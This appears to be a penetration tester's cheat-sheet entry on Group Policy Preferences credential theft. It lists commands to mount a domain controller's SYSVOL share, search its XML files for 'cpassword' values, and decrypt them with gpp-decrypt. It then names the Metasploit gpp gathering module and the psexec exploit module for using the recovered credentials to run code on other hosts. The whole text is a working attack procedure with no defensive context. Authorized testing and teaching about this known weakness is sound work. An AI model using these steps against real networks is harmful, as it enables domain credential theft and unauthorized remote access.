# GPP
# check for ip address of domain controller
nslookup nameofserver.whatever.local

# now mount it
net use z: \\<DC IP address>\SYSVOL

# go to z: drive
z:

# search for Groups.xml files
dir Groups.xml /s

# search for all .xml files for keyword "cpassword"
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml

# decrypt the password found
gpp-decrypt <pass>

# Metasploit module
post/windows/gather/credentials/gpp
# after credentials are found, use Psexec module
exploit/windows/smb/psexec

-------------------------------------------------------------------------------
